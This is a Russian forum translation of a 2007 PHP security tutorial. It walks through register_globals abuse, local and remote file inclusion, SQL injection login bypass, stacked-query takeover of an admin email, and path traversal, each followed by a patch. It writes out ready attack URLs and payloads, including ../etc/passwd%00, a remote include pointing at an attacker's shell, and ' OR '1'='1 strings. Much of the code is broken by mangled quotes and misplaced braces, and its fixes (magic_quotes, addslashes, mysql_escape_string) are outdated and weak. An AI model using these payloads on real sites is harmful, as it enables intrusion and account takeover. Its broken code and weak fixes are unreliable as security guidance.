Форум АНТИЧАТ - Php Underground

Оригинальную статью на английском можно заценить тут -
http://www.playhack.net/view.php?type=1&id=22

-[ INFOS ]-----------------------------------------------------------------------

Title: "PHP Undergroud Security"
Author: Omnipresent
E-Mail: omnipresent@email.it - omni@playhack.net
Website: http://omni.playhack.net - http://www.playhack.net
Date: 2007-04-12

---------------------------------------------------------------------------------

-[ SUMMARY ]---------------------------------------------------------------------

0x00: Начнем..
0x01: Глобальные переменные.. Осторожно
[*] Patching
0x02: File Inclusion
[*] Patching
0x03: XSS
0x04: SQL Injection
\_ 0x04a: Login Bypass
\_ 0x04b: 1 Query? No.. 2 one!
[*] Patching
0x05: File Traverse
[*] Patching
0x05: Заключение

---------------------------------------------------------------------------------

---[ 0x00: Let"s start.. ]

В этом туториале я объясню основные PHP уязвимости и ошибки, расскажу про то как
их использовать и не допускать их.

Удачи!

-----------------------------------------------------------------------------[/]

---[ 0x01: Глобальные переменные, осторожнее!]

В PHP не нужно декларировать переменные, это отличная вещ для кодера, переменные
создаются "автоматически" когда нужно.
Отличная вещь... Иногда
PHP, как известно, также принимает данные от пользователя, обрабатывая их. Если
мы не определили переменную до её использования могут возникнуть проблемы,
касающиеся безопасности приложений. Для примера, взглянем на следующий код:

PHP код:


		
			


    if ($is_admin == 1) {

        //Да, я админ, открываем админ.панель

        [...]

    } else {

        //Нет, не админ

        [...]

    }

Как можно увидеть, $is_admin не определена раньше, поэтому мы легко
можем получить несанкционированный доступ к админ.панели.
Да, но как? Просто:

http://remote_host/bugged.php?is_admin=1

---[ Patching ]---

Как защитится от этого? Просто: задекларировать $is_admin до блока IF,
примерно так:

PHP код:


		
			
$is_admin = 0;



[...]



    if ($is_admin == 1) {

        //Yes, I"m the admin so call the Administration Pannel

        [...]

    } else {

        //No, I"m not the admin

        [...]

    }

-----------------------------------------------------------------------------[/]

---[ 0x02: File Inclusion]

-----[Local File Inclusion]

PHP отличный, мощный язык, но нужно внимательно смотреть за своим кодом дабы
препятствовать возникновению проблем с безопасностью.
В многих ситуациях очень удобно использовать динамические инклуды, где часть
пути к файлу находится в переменной, как к примеру

PHP код:


		
			
<?php



    include "/users/".$include_path.".php";

    [...]

?>

$include_path не задекларированная до использования, поэтому можно поместить в
переменную любое значение, к примеру то же /etc/passwd.
Для этого просто нужно модифицировать include_path в URL; к примеру

http://remote_host/bugged.php?include_path=../../../../etc/passwd%00

В результате мы получим

PHP код:


		
			
<?php



    include "/users/../../../../etc/passwd%00.php"

    [...]

?>

- [ NOTE ] -

А что такое %00? Это означает нулевой символ, который "удаляет" расширение PHP.
Если мы пропустим нулевой байт, мы сможем смотреть ТОЛЬКО .php файлы, потому что
расширение подключаемого файла - PHP (include "/users/".$include_path.".PHP")

-------------------------------------------------------------------------------

-----[ Remote File Inclusion]

Возьмем следующий код:

PHP код:


		
			
<?php



    [...]



        include($_GET["pag"]);



    [...]



?>

Как видим, $page не утверждена до использования, поэтому злоумышленник может
проинклудить свой скрипт с помощью браузера, и получить доступ к машине, или
получить листинг к файлам.

Пример один: (доступ к машине)

http://remote_host/inc.php?pag=[Evil Script - our shell located on our server]

Пример 2: (просмотр файлов)

http://remote_host/inc.php?pag=/etc/passwd

---[ Patching ]---

Какое решение? подтверждать ввод. Один из многих методов - создать список
разрешенных страниц, как показано ниже:

PHP код:


		
			
[...]



    $pag = $_GET["pag"];



    $pages = array("index.php", "alfa.php", "beta.php", "gamma.php");

    

        if(in_array($pag, $pages))

        {

            include($pag);

        {

            else

            {

            die("Hacking Attempt!");

            }



[...]

-----------------------------------------------------------------------------[/]

---[ 0x03: XSS]

Хочешь узнать про XSS?

Мой партнер написал большую статью про это, а я не вижу смысла писать об этом
дважды, поэтому держите:

[+] "Cross-Site Scripting for Fun and Profit"
http://www.playhack.net/view.php?type=1&id=18

[+] "Applying XSS to Phishing Attacks"
http://www.playhack.net/view.php?type=1&id=20

-----------------------------------------------------------------------------[/]

---[ 0x03: SQL Injection]

С помощью SQL Injection, как видно из названия, можно внедрить произвольный SQL
Code в уязвимое приложение.

------[ 0x04b Login Bypass ]

До того как мы начнем с небольшого примера, нужно узнать несколько вещей про SQL:

- (")кавычка. В SQL это оператор разграничивает строки, что важно для поиска
уязвимостей.

- (#)комментарий. Означает, что мы пытаемся сделать комментарии. Запомните, это
важно и нужно!

- (;)Это значит мы делаем новый запрос.. легко

После небольшого перерыва на важные операнды, приступим к первому примеру. Обход
Логина - Получаем права администратора

PHP код:


		
			
<?php



    // login.php

        

    $nick = $_POST["nick"];

    $pass = $_POST["pass"];



    $link = mysql_connect("localhost", "root", "root") or die("Error: ".

        mysql_error());



    mysql_select_db("sql_inj", $link);





$query = mysql_query("SELECT * FROM sql_inj WHERE nick ="".$nick."" 

AND pass ="" .$pass. """, 

$link);



if (mysql_num_rows($query) == 0) {

echo "<script type="text/javascript">window.location.href="index.html";

</script>";

exit;

}



    $logged = 1;



    [...]



    //EoF



    ?>

Этот скрипт очень простой, но очень полезный, для того чтобы узнать
немного о SQL Injection.
Как мы видим, переменные $nick и $pass не обработаны должным образом до того
как они были использованы в запросе, поэтому можем вставить код.. наш SQL код.

Посмотрим на запрос:

"SELECT * FROM sql_inj WHERE nick ="".$nick."" AND pass ="" .$pass. """

Что случится, если мы передадим две переменные, испорченные как тут:

$nick = 1" OR "1" = "1
$pass = 1" OR "1" = "1

Новый запрос будет:

"SELECT * FROM sql_inj WHERE nick ="1 OR "1" = "1" AND pass ="1" OR "1" = "1""

Понятно? нет? Ладно, объясню более понятно..

Если ты хоть немного знаешь о таблицах истинности, тебе будет легко понять..

1 OR 1 = 1 ??

Один или один эквивалентно один? Да, правильно

А кто первый пользователь в таблице "sql_inj"?
Тот кто установил приложение? Да! Админ)

Итак, мы вошли как первый пользователь, а первый пользователь - админ=)

Также мы можем задать следующий запрос:

$nick = 1" OR "1" = "1" #
$pass = what_we_want_to_put

Новый запрос будет:

"SELECT * FROM sql_inj WHERE nick ="1 OR "1" = "1" #
AND pass = what_we_want_to_put"

Как сказано выше, "#" означает что все что идет после оператора, является
комментарий.
НОВЫЙ запрос:

"SELECT * FROM sql_inj WHERE nick ="1 OR "1" = "1"

И мы опять Админ)

------[ 0x04b: 1 Query? No.. 2 one! ]

С SQL Injection мы можем модифицировать запросы, изменять даты, обновлять
профили и многое другое...
Посмотрим на следующий код:

PHP код:


		
			
<?php



//email.php



[...]



$email = $_POST["email"];



[...]



$query = mysql_query("SELECT email, passwd, user_name FROM users WHERE email = 

"".$email.""");

[...]



?>

Что мы здесь видим? $email не объявлена до использования..отлично!
Мы можем использовать это и.. к примеру, обновить базу данных, вводя новый
запрос вроде этого:

$email = x"; UPDATE users SET email = "omnipresent@email.it"
WHERE email = "admin@site.com ";

новый запрос будет такой:

SELECT email, passwd, user_name FROM users
WHERE email = " x"; UPDATE users SET email = "omnipresent@email.it"
WHERE email = "admin@site.com ";

Здесь, нападающий обновил таблицу "users", изменив админский email на свой.
К примеру, со скриптом "Восстановление пароля", он может ввести свой email
(omnipresent@email.it)
и получить письмо вроде такого:

From: host@site.com
To: omnipresent@email.it
Subject: Login Password

Ehy.. take it ;)

Username: Admin
Password: 12345

Regards,
Admin

---[ Patching ]---

Для того чтобы пропатчить скрипты мы можем немного изменить php.ini файл:

1. set magic_quotes_gcp to On

Это позволит избежать кавычки в:
-COOKIE
-POST
-GET

2 использовать addslashes()

Это позволит экранировать кавычки

3. htmlspecialchars()

Будет конвертировать спец. символы в HTML формат

4. mysql_escape_string()

Функция экранирует все спецсимволы в unescaped_string, вследствие чего,
её можно безопасно использовать в mysql_query().

5. Смотрите php.net, для использования других фунцкий

6. Проверьте входные данные пользователя, как в примере ниже:

$user_id = (int)$_GET["user_id"];

$user_id это всегда целое число и можем отбросить ненужные вход. данные
для безопасности.

-----------------------------------------------------------------------------[/]

---[ 0x05: File Traverse ]

Траверсинг файловой системы действительно важный и критический баг.

Когда мы используем файл, мы должны индифитицировать имя файла и путь до него в
указателях до скрипта. Во многих случаях, имя файла задается пользователем,
аргумент задается в функцию fopen(), как здесь:

PHP код:


		
			
<?php



[...]



    $fp = fopen("/path/{$_GET["filename"]}.txt", "r");



[...]



?>

В этом скрипте есть уязвимость, потому что "filename" может быть задано
удаленным пользователем. In this case the attacker can traveses the
filesystem by using multiple instances of "../" to move up to the directory
tree and see other files.

К примеру:
http://remote_host/path/bug.php?filename=../../../../path_of_another_file/file%00

Всегда помните, что нулевой байт используется во многих атаках для удаления
файлового расширения, задаваемого скриптом.

---[ Patching ]---

Отличное решение пропатчить этот скрипт - использовать basename(), как показано
в скрипте ниже:

PHP код:


		
			
<?php

 

    $clean = array(); 

    

    if (basename($_GET["filename"]) == $_GET["filename"]) 

        { 

            $clean["filename"] = $_GET["filename"]; 

        } 

    else 

        { 



            [...]



        } 



$fp = fopen("/path/{$clean["filename"]}.txt", "r");





?>

-----------------------------------------------------------------------------[/]

---[ 0x06: Заключение ]

Это конец статьи "PHP Undergroud Security", и я надеюсь она поможет вам
обезопасить PHP code!

При любых проблемах пишите на omnipresent@email.it или
omni@playhack.net.

-----------------------------------------------------------------------------[/]

\======================================[EOF]=====================================/

© milw0rm.com [2007-04-12]

© перевод Robin_HOOD@GFS
Спасибо Neminem за помощь в переводе